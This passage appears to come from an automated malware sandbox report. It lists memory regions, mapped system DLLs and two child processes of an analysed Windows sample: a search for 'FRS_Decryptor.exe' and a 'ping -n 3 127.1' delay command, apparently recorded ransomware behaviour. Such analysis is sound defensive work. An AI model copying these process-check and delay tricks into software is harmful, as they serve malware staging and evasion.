entry_point = 0x0 region_type = private name = "private_0x000000007e84b000" filename = "" Region: id = 8160 start_va = 0x7e84e000 end_va = 0x7e84efff entry_point = 0x0 region_type = private name = "private_0x000000007e84e000" filename = "" Region: id = 8161 start_va = 0x7e84f000 end_va = 0x7e84ffff entry_point = 0x0 region_type = private name = "private_0x000000007e84f000" filename = "" Region: id = 8162 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8163 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8164 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8165 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8185 start_va = 0x820000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 8186 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8187 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8188 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8202 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 8203 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 8204 start_va = 0x5f0000 end_va = 0x5f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8205 start_va = 0x6c0000 end_va = 0x73dfff entry_point = 0x6c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8206 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 8207 start_va = 0x750000 end_va = 0x750fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 8208 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 8209 start_va = 0x770000 end_va = 0x773fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 8210 start_va = 0x780000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 8211 start_va = 0x790000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 8212 start_va = 0x970000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 8213 start_va = 0xa70000 end_va = 0xbf7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 8214 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 8215 start_va = 0xc20000 end_va = 0xda0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 8216 start_va = 0xdb0000 end_va = 0x21affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 8217 start_va = 0x21b0000 end_va = 0x22f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 8218 start_va = 0x2300000 end_va = 0x25d4fff entry_point = 0x2300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8219 start_va = 0x25e0000 end_va = 0x29dbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 8220 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 8221 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 8222 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 8223 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 8224 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 8225 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 8226 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 8227 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 8228 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 8229 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 8230 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8231 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8232 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8233 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8234 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8235 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8236 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8237 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8238 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8239 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8240 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8241 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8242 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8243 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8244 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8245 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8246 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8247 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8248 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8249 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8250 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8251 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8252 start_va = 0x7e720000 end_va = 0x7e81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e720000" filename = "" Region: id = 8253 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 8254 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 8255 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 8256 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 8257 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 8258 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 8259 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 8260 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 8261 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 8262 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 8263 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 8264 start_va = 0x7e71d000 end_va = 0x7e71ffff entry_point = 0x0 region_type = private name = "private_0x000000007e71d000" filename = "" Region: id = 8265 start_va = 0x7e845000 end_va = 0x7e847fff entry_point = 0x0 region_type = private name = "private_0x000000007e845000" filename = "" Region: id = 8266 start_va = 0x7e848000 end_va = 0x7e84afff entry_point = 0x0 region_type = private name = "private_0x000000007e848000" filename = "" Region: id = 8267 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 441 os_tid = 0x880 Thread: id = 443 os_tid = 0xa18 Thread: id = 444 os_tid = 0x878 Thread: id = 445 os_tid = 0x644 Process: id = "161" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x5d50b000" os_pid = "0x7bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "159" os_parent_pid = "0x860" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8167 start_va = 0xf80000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 8168 start_va = 0xfa0000 end_va = 0xfa1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 8169 start_va = 0xfb0000 end_va = 0xfbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 8170 start_va = 0xfc0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 8171 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 8172 start_va = 0x1040000 end_va = 0x1043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 8173 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 8174 start_va = 0x1060000 end_va = 0x1061fff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 8175 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 8176 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8177 start_va = 0x7ebc0000 end_va = 0x7ebe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebc0000" filename = "" Region: id = 8178 start_va = 0x7ebe4000 end_va = 0x7ebe4fff entry_point = 0x0 region_type = private name = "private_0x000000007ebe4000" filename = "" Region: id = 8179 start_va = 0x7ebe7000 end_va = 0x7ebe7fff entry_point = 0x0 region_type = private name = "private_0x000000007ebe7000" filename = "" Region: id = 8180 start_va = 0x7ebed000 end_va = 0x7ebeffff entry_point = 0x0 region_type = private name = "private_0x000000007ebed000" filename = "" Region: id = 8181 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8182 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8183 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8184 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8189 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 8190 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8191 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8192 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8193 start_va = 0xf80000 end_va = 0xf8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 8194 start_va = 0xfa0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 8195 start_va = 0x1070000 end_va = 0x10edfff entry_point = 0x1070000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8196 start_va = 0x1270000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 8197 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 8198 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8199 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8200 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8201 start_va = 0x7eac0000 end_va = 0x7ebbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 8268 start_va = 0xf90000 end_va = 0xf93fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 8269 start_va = 0x10f0000 end_va = 0x10f3fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 8270 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 442 os_tid = 0x870 Process: id = "162" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x5dda000" os_pid = "0x648" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8271 start_va = 0x430000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 8272 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 8273 start_va = 0x460000 end_va = 0x46efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8274 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8275 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 8276 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 8277 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 8278 start_va = 0x510000 end_va = 0x511fff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 8279 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 8280 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8281 start_va = 0x7e250000 end_va = 0x7e272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e250000" filename = "" Region: id = 8282 start_va = 0x7e274000 end_va = 0x7e274fff entry_point = 0x0 region_type = private name = "private_0x000000007e274000" filename = "" Region: id = 8283 start_va = 0x7e27b000 end_va = 0x7e27bfff entry_point = 0x0 region_type = private name = "private_0x000000007e27b000" filename = "" Region: id = 8284 start_va = 0x7e27d000 end_va = 0x7e27ffff entry_point = 0x0 region_type = private name = "private_0x000000007e27d000" filename = "" Region: id = 8285 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8286 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8287 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8288 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8289 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8290 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8291 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8292 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8293 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 8294 start_va = 0x440000 end_va = 0x443fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 8295 start_va = 0x520000 end_va = 0x59dfff entry_point = 0x520000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8296 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 8297 start_va = 0xab0000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 8298 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 8299 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 8300 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8301 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8302 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8303 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8304 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8305 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8306 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = 